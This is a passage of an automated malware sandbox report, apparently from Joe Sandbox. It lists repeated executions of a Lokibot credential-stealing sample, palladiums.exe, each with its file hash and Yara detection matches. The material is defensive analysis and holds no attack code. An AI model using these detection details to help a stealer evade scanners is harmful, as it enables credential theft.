Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:02:17
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:02:18
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000017.00000002.2272751732.0000000001440000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:02:18
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	05:02:19
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:02:20
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001A.00000002.2298419154.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:02:21
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	05:02:22
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	05:02:23
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	05:02:24
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	05:02:25
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	05:02:26
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	05:02:26
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	05:02:27
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	05:02:28
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000023.00000002.2384959572.0000000001340000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	05:02:30
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Imagebase:	0x30000
File size:	1'176'576 bytes
MD5 hash:	6D9798801523EE1C8C5DC83D28346814
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	05:02:31
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\preinhered\palladiums.exe
Wow64 process (32bit):	true
